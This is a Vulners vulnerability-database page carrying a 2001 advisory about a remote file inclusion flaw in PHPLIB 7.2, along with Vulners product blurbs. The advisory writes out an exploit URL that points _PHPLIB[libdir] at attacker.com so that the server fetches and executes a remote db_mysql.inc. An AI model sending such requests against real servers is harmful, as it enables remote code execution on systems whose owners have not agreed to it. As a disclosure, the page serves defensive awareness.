Vulners
Lucene search
PHPLib Team PHPLIB 7.2 - Remote Script Execution
source: https://www.securityfocus.com/bid/3079/info
The PHP Base Library('PHPLIB') is a code library which provides support for session management in web applications. It is targeted to developers and is widely used in many web applications, so a strong possibility exists that an application may be using it without the knowledge of the administrator.
A problem in PHPLIB will allow remote attackers to submit malicious input in web requests that will cause the application to fetch and then execute scripts from another host.
This may allow for attackers to gain local access to the webserver.
If $_PHPLIB[libdir] is a string whose value
is "http://attacker.com/", this instruction will be executed:
require("http://attacker.com/" . "db_mysql.inc");
Thus, simply crafting a URL like:
http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/
will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jul 2001 00:00Current
7.6High risk
Vulners AI Score7.6